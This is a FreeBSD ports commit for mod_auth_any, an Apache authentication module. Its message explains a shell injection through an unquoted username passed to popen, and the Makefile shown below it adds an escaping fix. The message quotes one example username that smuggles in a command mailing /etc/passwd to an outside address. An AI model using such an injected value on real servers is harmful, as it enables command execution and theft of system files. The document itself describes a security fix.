0025bdf0b2
the server with the uid of the apache process. Background [1]: "The module accepts a username and password from the web client, passes them to a user-space executable (using popen(3), which invokes a shell) and waits for a response in order to authenticate the user. The password is quoted on the popen() command line to avoid interpretation of shell special chars, but the username is not. Thus a malicious user can execute commands by supplying an appropriately crafted username. (e.g. "foo&mail me@my.home</etc/passwd") "The problem is easily fixed by adding quotes (and escaping any quotes already present) to the username and password in the popen command line." o Fix this by adding a escaping function from [2]. Then, modifying this function appropriately with ideas from [3]. Apply the new escaping code to mod_auth_any. o Bump PORTREVISION Submitted by: Security Officer (nectar), Red Hat Security Response Team <security@redhat.com> [1] Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3]
34 lines
785 B
Makefile
34 lines
785 B
Makefile
# New ports collection makefile for: mod_auth_any
|
|
# Date created: 10 April 2001
|
|
# Whom: will
|
|
#
|
|
# $FreeBSD$
|
|
#
|
|
|
|
PORTNAME= mod_auth_any
|
|
PORTVERSION= 1.0.2
|
|
PORTREVISION= 1
|
|
CATEGORIES= www
|
|
MASTER_SITES= ftp://ftp.itlab.musc.edu/pub/toolbox/mod_auth_any/
|
|
EXTRACT_SUFX= .tgz
|
|
|
|
MAINTAINER= ports@FreeBSD.org
|
|
COMMENT= Apache module to use any command line program to authenticate a user
|
|
|
|
BUILD_DEPENDS= ${APXS}:${APACHE_PORT}
|
|
RUN_DEPENDS= ${APXS}:${APACHE_PORT}
|
|
|
|
APXS?= ${LOCALBASE}/sbin/apxs
|
|
APACHE_PORT?= ${PORTSDIR}/www/apache13
|
|
|
|
post-patch:
|
|
@${CAT} ${FILESDIR}/bash_single_quote_escape_string.c >> \
|
|
${WRKSRC}/${PORTNAME}.c
|
|
|
|
do-build:
|
|
@cd ${WRKSRC} && ${APXS} -c ${PORTNAME}.c
|
|
|
|
do-install:
|
|
${APXS} -i -A -n ${PORTNAME:S/mod_//g} ${WRKSRC}/${PORTNAME}.so
|
|
|
|
.include <bsd.port.mk>
|